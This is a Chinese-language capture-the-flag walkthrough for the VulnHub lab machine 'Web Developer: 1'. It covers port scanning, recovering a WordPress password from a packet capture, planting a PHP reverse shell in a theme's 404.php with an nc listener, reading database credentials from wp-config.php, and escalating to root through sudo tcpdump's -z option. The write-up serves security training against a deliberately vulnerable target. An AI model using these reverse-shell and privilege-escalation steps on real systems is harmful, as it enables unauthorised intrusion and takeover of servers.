VulnHub靶场篇4-Web-Developer-1

靶机地址：Web Developer: 1 ~ VulnHub

文章主要是简要记录每一个过程，没有专门地对每一步截图，也许有些步骤中并不详细，会在文末附上相关详细的渗透文章

主机探测&端口扫描

靶机ip为 192.168.31.118

端口扫描结果：
22和80端口

>> nmap -A -p- -T5 -sV 192.168.31.118
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-26 23:29 CST
Nmap scan report for 192.168.31.118
Host is up (0.00039s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)
|   256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)
|_  256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 4.9.8
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Example site – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.26 seconds

信息搜集

1. 目录爆破
   发现有一个ipdata目录，前往 192.168.31.118/ipdata

dirb http://192.168.31.118

2. .cap文件
   使用WireShark分析.cap文件
   针对HTTP和POST两个关键词搜到180和665两条信息
   180的信息中包含用户webdevelop的登录信息

   Form item: "log" = "webdeveloper"
   Form item: "pwd" = "Te5eQg&4sBS!Yr$)wf%(DcAd"
   

权限获取

思路一：文件上传（404.php页面）

1. 在下面404.php文件处写入反向连接的代码（见第2步），并保存

2. 反向连接的代码，需要修改其中的ip为本机kali的ip，端口默认为1234

cp /usr/share/webshells/php/php-reverse-shell.php .

3. 写入完成后，在kali上监听端口

nc -lvp 1234

4. 访问页面，回到kali，可以看到已经获取到权限了，

192.168.31.118/wp-content/themes/twentysixteen/404.php

思路二：文件上传（插件处上传）

参考：Root Network Security (rootnetsec.com)

权限提取

在获取到的低权限用户中可以访问到敏感文件wp-config.php，里面存储着数据库用户名和密码，尝试进行连接

/** MySQL database username */
define('DB_USER', 'webdeveloper');

/** MySQL database password */
define('DB_PASSWORD', 'MasterOfTheUniverse');

登录进去后通过下面的命令，查看自己执行sudo后的权限，发现可以执行tcpdump

sudo -l
(root) /usr/sbin/tcpdump

思路一：通过root执行tcpdump指令获取flag.txt

1. 在该用户中创建文件

touch /tmp/exploit

2. 写入shellcode

echo 'cat /root/flag.txt' > /tmp/exploit

3. 赋予该文件执行权限

chmod +x /tmp/exploit

4. 执行tcpdump指令，得到flag.txt

sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

上面这行代码的具体含义还不是很清楚

tcpdump命令详解：

• -i eth0 从指定网卡捕获数据包
• -w /dev/null 将捕获到的数据包输出到空设备（不输出数据包结果）
• -W [num] 指定抓包数量
• -G [rotate_seconds] 每rotate_seconds秒一次的频率执行-w指定的转储
• -z [command] 运行指定的命令
• -Z [user] 指定用户执行命令

总结

1. WireShark使用
   分析.cap文件，每一条的详细信息
   ARP(Address Resolution Protocol)
TCP(Transmission Control Protocol)
HTTP(Hypertext Transfer Protocol)

2. Vim的使用
   复制粘贴等

3. 交互式tty

   python -c 'import pty;pty.spawn("/bin/bash")
   

   优点：显示友好，有历史记录等等

参考

Root Network Security (rootnetsec.com)

No.29-VulnHub-Web Developer: 1-Walkthrough渗透学习-CSDN博客

(2条消息) Vulnhub靶机渗透测试实战（二）：Web Developer: 1_Jenny_Zhx的博客-CSDN博客